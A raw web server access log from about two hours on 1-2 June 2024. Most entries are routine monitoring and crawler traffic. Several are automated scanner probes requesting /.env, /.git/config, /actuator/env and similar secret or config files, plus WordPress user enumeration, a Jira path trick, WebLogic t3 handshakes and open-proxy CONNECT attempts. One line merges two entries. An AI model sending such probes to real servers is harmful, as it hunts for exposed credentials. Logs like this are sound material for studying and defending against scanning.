212.91.246.72 - - [01/Jun/2024:22:57:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
13.40.27.24 - - [01/Jun/2024:22:57:38 +0200] "GET /doc/index.html HTTP/1.1" 404 319 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
195.154.87.70 - - [01/Jun/2024:22:58:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Jun/2024:22:58:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2024:22:59:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
13.40.27.24 - - [01/Jun/2024:22:59:55 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [01/Jun/2024:23:00:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2024:23:01:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2024:23:02:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
13.40.27.24 - - [01/Jun/2024:23:02:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
185.191.126.213 - - [01/Jun/2024:23:02:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Jun/2024:23:03:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2024:23:04:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.94.138.127 - - [01/Jun/2024:23:05:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.127 - - [01/Jun/2024:23:05:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.127 - - [01/Jun/2024:23:05:09 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.138.127 - - [01/Jun/2024:23:05:09 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [01/Jun/2024:23:05:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [01/Jun/2024:23:05:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Jun/2024:23:06:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
5.196.102.78 - - [01/Jun/2024:23:06:20 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
185.191.126.213 - - [01/Jun/2024:23:07:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Jun/2024:23:07:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [01/Jun/2024:23:07:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Jun/2024:23:08:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2024:23:09:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2024:23:10:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2024:23:11:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2024:23:12:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2024:23:13:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.17 - - [01/Jun/2024:23:13:27 +0200] "CONNECT example.com:80 HTTP/1.1" 405 340 "-" "-"
212.91.246.72 - - [01/Jun/2024:23:14:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2024:23:15:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2024:23:16:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2024:23:17:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2024:23:18:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2024:23:19:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [01/Jun/2024:23:19:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Jun/2024:23:20:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [01/Jun/2024:23:20:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Jun/2024:23:21:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2024:23:22:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2024:23:23:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
62.210.90.217 - - [01/Jun/2024:23:23:33 +0200] "HEAD / HTTP/1.1" 200 - "-" "curl/7.81.0"
62.210.90.217 - - [01/Jun/2024:23:23:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.3"
62.210.90.217 - - [01/Jun/2024:23:23:36 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.3"
62.210.90.217 - - [01/Jun/2024:23:23:37 +0200] "GET /ads.txt HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.3"
62.210.90.217 - - [01/Jun/2024:23:23:37 +0200] "GET /app-ads.txt HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.3"
62.210.90.217 - - [01/Jun/2024:23:23:37 +0200] "GET /sellers.json HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.3"
212.91.246.72 - - [01/Jun/2024:23:24:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
205.210.31.242 - - [01/Jun/2024:23:24:19 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
185.191.126.213 - - [01/Jun/2024:23:24:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [01/Jun/2024:23:24:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Jun/2024:23:25:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.17 - - [01/Jun/2024:23:25:28 +0200] "CONNECT example.com:80 HTTP/1.1" 405 340 "-" "-"
185.224.128.17 - - [01/Jun/2024:23:25:29 +0200] "" 501 315 "-" "-"
212.91.246.72 - - [01/Jun/2024:23:26:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2024:23:27:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2024:23:28:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
164.90.228.79 - - [01/Jun/2024:23:28:42 +0200] "\x16\x03\x01" 501 318 "-" "-"
164.90.228.79 - - [01/Jun/2024:23:28:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
164.90.228.79 - - [01/Jun/2024:23:28:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA800061) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.3562.98 Mobile Safari/537.3"
164.90.228.79 - - [01/Jun/2024:23:28:43 +0200] "GET /server HTTP/1.1" 404 311 "-" "Go-http-client/1.1"
164.90.228.79 - - [01/Jun/2024:23:28:43 +0200] "GET /.vscode/sftp.json HTTP/1.1" 404 322 "-" "Go-http-client/1.1"
164.90.228.79 - - [01/Jun/2024:23:28:43 +0200] "GET /about HTTP/1.1" 404 310 "-" "Go-http-client/1.1"
164.90.228.79 - - [01/Jun/2024:23:28:43 +0200] "GET /debug/default/view?panel=config HTTP/1.1" 404 323 "-" "Go-http-client/1.1"
164.90.228.79 - - [01/Jun/2024:23:28:43 +0200] "GET /v2/_catalog HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
164.90.228.79 - - [01/Jun/2024:23:28:43 +0200] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 404 380 "-" "Go-http-client/1.1" fee8d5bfdc.scan.leakix.org - - [01/Jun/2024:23:28:43 +0200] "GET /server-status HTTP/1.1" 403 322 "-" "Go-http-client/1.1"
164.90.228.79 - - [01/Jun/2024:23:28:43 +0200] "GET /login.action HTTP/1.1" 404 317 "-" "Go-http-client/1.1"
164.90.228.79 - - [01/Jun/2024:23:28:43 +0200] "GET /_all_dbs HTTP/1.1" 404 313 "-" "Mozilla/5.0 (l9scan/2.0.3383e2634323e21393e2231323; +https://leakix.net)"
164.90.228.79 - - [01/Jun/2024:23:28:43 +0200] "GET /.DS_Store HTTP/1.1" 404 314 "-" "Go-http-client/1.1"
164.90.228.79 - - [01/Jun/2024:23:28:43 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Go-http-client/1.1"
164.90.228.79 - - [01/Jun/2024:23:28:43 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
164.90.228.79 - - [01/Jun/2024:23:28:43 +0200] "GET /s/3383e2634323e21393e2231323/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1" 404 403 "-" "Go-http-client/1.1"
94.156.65.209 - - [01/Jun/2024:23:28:45 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (MeeGo; NokiaN9) AppleWebKit/534.13 (KHTML, like Gecko) NokiaBrowser/8.5.0 Mobile Safari/534.13"
164.90.228.79 - - [01/Jun/2024:23:28:46 +0200] "GET /config.json HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
164.90.228.79 - - [01/Jun/2024:23:28:46 +0200] "GET /telescope/requests HTTP/1.1" 404 323 "-" "Go-http-client/1.1"
164.90.228.79 - - [01/Jun/2024:23:28:46 +0200] "GET /?rest_route=/wp/v2/users/ HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Jun/2024:23:29:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
91.187.125.238 - - [01/Jun/2024:23:29:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
195.154.87.70 - - [01/Jun/2024:23:29:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Jun/2024:23:30:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2024:23:31:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [01/Jun/2024:23:31:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Jun/2024:23:32:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
43.159.128.149 - - [01/Jun/2024:23:33:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
212.91.246.72 - - [01/Jun/2024:23:33:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2024:23:34:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2024:23:35:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2024:23:36:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2024:23:37:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2024:23:38:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2024:23:39:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
189.59.81.65 - - [01/Jun/2024:23:39:50 +0200] "HEAD / HTTP/1.1" 200 - "-" "-"
189.59.81.65 - - [01/Jun/2024:23:39:51 +0200] "HEAD / HTTP/1.1" 200 - "-" "-"
189.59.81.65 - - [01/Jun/2024:23:39:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
189.59.81.65 - - [01/Jun/2024:23:39:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
189.59.81.65 - - [01/Jun/2024:23:39:56 +0200] "HEAD / HTTP/1.1" 200 - "-" "-"
189.59.81.65 - - [01/Jun/2024:23:39:56 +0200] "HEAD / HTTP/1.1" 200 - "-" "-"
189.59.81.65 - - [01/Jun/2024:23:39:56 +0200] "HEAD / HTTP/1.1" 200 - "-" "-"
189.59.81.65 - - [01/Jun/2024:23:39:56 +0200] "HEAD / HTTP/1.1" 200 - "-" "-"
189.59.81.65 - - [01/Jun/2024:23:39:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
189.59.81.65 - - [01/Jun/2024:23:39:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
189.59.81.65 - - [01/Jun/2024:23:39:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
189.59.81.65 - - [01/Jun/2024:23:39:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Jun/2024:23:40:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
46.101.123.227 - - [01/Jun/2024:23:40:43 +0200] "\x16\x03\x01" 501 318 "-" "-"
46.101.123.227 - - [01/Jun/2024:23:40:43 +0200] "\x16\x03\x01" 501 318 "-" "-"
46.101.123.227 - - [01/Jun/2024:23:40:44 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [01/Jun/2024:23:41:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2024:23:42:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2024:23:43:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2024:23:44:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2024:23:45:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2024:23:46:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2024:23:47:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2024:23:48:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2024:23:49:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2024:23:50:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2024:23:51:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2024:23:52:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2024:23:53:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2024:23:54:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
52.230.152.154 - - [01/Jun/2024:23:54:56 +0200] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.0; +https://openai.com/gptbot)"
212.91.246.72 - - [01/Jun/2024:23:55:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [01/Jun/2024:23:55:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Jun/2024:23:56:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2024:23:57:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2024:23:58:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2024:23:59:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jun/2024:00:00:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jun/2024:00:01:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
168.76.20.229 - - [02/Jun/2024:00:02:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.2623.112 Safari/537.36"
212.91.246.72 - - [02/Jun/2024:00:02:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
195.154.87.70 - - [02/Jun/2024:00:04:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
165.154.6.224 - - [02/Jun/2024:00:10:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.29.0"
165.154.6.224 - - [02/Jun/2024:00:10:13 +0200] "\x16\x03\x01" 501 318 "-" "-"
165.154.6.224 - - [02/Jun/2024:00:10:14 +0200] "t3 12.1.2" 400 329 "-" "-"
165.154.182.92 - - [02/Jun/2024:00:17:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 9_0_2; Win64; x64) AppleWebKit/540.43 (KHTML, like Gecko) Chrome/65.0.2096 Safari/537.36"
165.154.182.92 - - [02/Jun/2024:00:17:03 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
165.154.182.92 - - [02/Jun/2024:00:17:03 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Go-http-client/1.1"
165.154.182.92 - - [02/Jun/2024:00:17:03 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
165.154.182.92 - - [02/Jun/2024:00:17:06 +0200] "GET /axis2-admin/ HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
165.154.182.92 - - [02/Jun/2024:00:17:06 +0200] "GET /axis2/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
165.154.182.92 - - [02/Jun/2024:00:17:06 +0200] "GET /axis2/axis2-admin/ HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
198.235.24.78 - - [02/Jun/2024:00:23:44 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
194.59.31.92 - - [02/Jun/2024:00:25:49 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
194.59.31.92 - - [02/Jun/2024:00:25:49 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
185.224.128.17 - - [02/Jun/2024:00:31:45 +0200] "CONNECT example.com:80 HTTP/1.1" 405 340 "-" "-"
185.224.128.17 - - [02/Jun/2024:00:31:46 +0200] "" 501 315 "-" "-"
51.222.82.223 - - [02/Jun/2024:00:39:22 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
51.222.82.223 - - [02/Jun/2024:00:39:22 +0200] "GET /message-api/actuator/env HTTP/1.1" 404 329 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
51.222.82.223 - - [02/Jun/2024:00:39:22 +0200] "GET /actuator/env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
51.222.82.223 - - [02/Jun/2024:00:39:22 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.224.128.43 - - [02/Jun/2024:00:39:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
195.154.87.70 - - [02/Jun/2024:00:41:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.224.128.43 - - [02/Jun/2024:00:45:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
94.156.65.209 - - [02/Jun/2024:00:45:46 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Linux; Android 9; ONEPLUS A5010) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36"
195.154.87.70 - - [02/Jun/2024:00:46:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
195.154.87.70 - - [02/Jun/2024:00:51:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.224.128.43 - - [02/Jun/2024:00:56:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
152.32.150.117 - - [02/Jun/2024:00:58:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.29.0"
152.32.150.117 - - [02/Jun/2024:00:58:28 +0200] "\x16\x03\x01" 501 318 "-" "-"
152.32.150.117 - - [02/Jun/2024:00:58:28 +0200] "t3 12.1.2" 400 329 "-" "-"
